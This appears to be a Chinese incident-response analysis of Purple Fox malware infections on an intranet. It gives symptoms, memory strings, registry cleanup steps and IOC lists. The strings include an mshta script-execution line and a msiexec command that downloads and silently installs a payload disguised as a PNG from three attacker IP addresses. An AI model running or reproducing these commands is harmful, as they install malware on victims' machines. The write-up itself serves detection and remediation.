SMB爆破
sqlserver爆破
永恒之蓝
2. 病毒特征
3. 病毒应急
3.1 病毒现象
某用户内网多台主机同时报端口扫描,
3.2 mshta恶意利用
mshta.exe vbscript:createobject("wscript.shell").run("@Cmd@",0)(window.close)
3.3 smb扫描
0x9c3a4 (10): ScanSmbHB6
0x9c4ac (70): 61.177.152.242|6|2|[SMB:H1:P1.30.3:A10:R3:B3:C3:D1:N3:SMB]|Smb.6bc.Us|
0x9c724 (60): Cmd /c for /d %i in (@WEB@) do Msiexec /i http://%i/@FIN@ /Q
0x9c7e3 (12): TScanAckTask
0x9d92c (31): C:\Windows\Apppatch\Aclmain.sdb
0x9e368 (11): 98.126.89.1
3.4 msiexec白加黑利用
0x137b788 (20): 125.68.199.232:17450
0x137b7ac (20): 125.68.199.232:17450
0x137b7d0 (12): 125.68.199.2
0x137b800 (41): 125.68.199.232:17450 196.202.30.19:16307
0x137b838 (21): 220.179.28.85:18162:d
0x137b85c (13): 220.179.28.85
0x137b88c (61): 220.179.28.85:18162 125.68.199.232:17450 196.202.30.19:16307
0x137b8d8 (21): Cmd /c for /d %i in (
0x137b8fc (80): Cmd /c for /d %i in (220.179.28.85:18162 125.68.199.232:17450 196.202.30.19:1630
0x137b95c (40): ) do Msiexec /i http://%i/08388E25.Png /
0x137b994 (40): ) do Msiexec /i http://%i/08388E25.Png /
0x137b9cc (123): Cmd /c for /d %i in (220.179.28.85:18162 125.68.199.232:17450 196.202.30.19:16307 ) do Msiexec /i http://%i/08388E25.Png /Q
3.4.1 msiexec分析
选择上面msiexec白加黑利用的url,直接下载相关的png
http://220.179.28.85:18162/08388E25.Png
http://125.68.199.232:17450/08388E25.Png
http://196.202.30.19:1630/08388E25.Png
实际上下载以后其实就是msi格式的,
相关的行为主要如下所示:
详细报告详见:
https://www.virustotal.com/gui/file/5f062d034dfdf7ac36b391dd6da1304b68574c65757673896cba13374551cafa/behavior/C2AE
3.4.2 密码爆破
通过对svchost.exe的内存进行分析,可以看到其内存里面有大量的密码字段,由于紫狐具有SMB爆破和mysql爆破的功能,这里面可以看到大量的密码爆破。
4. 处置
4.1 安全模式启动
4.2 删除恶意的dll文件
4.3 清除注册表
其在注册表中有两项,需要把这两项给清除掉
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\PendingFileRenameOperations中的:
C:\Windows\System32\MsxxxxxxApp.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost的netsvcs中的:
MsxxxxxxApp
4.3.1 注册表删除PendingFileRenameOperations
4.3.2 删除netsvcs
4.4 重启验证
5. 高隐匿分析
hide registry keys and values
hide files and directories
hide processes (experimental, might be not stable)
protect specific processes
exclude specific processes from hiding and protection features
usermode interface (lib and cli) for working with a driver
and so on
https://www.yuque.com/feiniao112/rq5bav/hx2kl5
6. IOC
6.1 IP
220.179.28.85
125.68.199.232
196.202.30.19
6.2 URL
http://220.179.28.85:18162/08388E25.Png
http://125.68.199.232:17450/08388E25.Png
http://196.202.30.19:1630/08388E25.Png
6.3 MD5
MD5:8708d160001b08b232090c4c7d2a9d4e
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论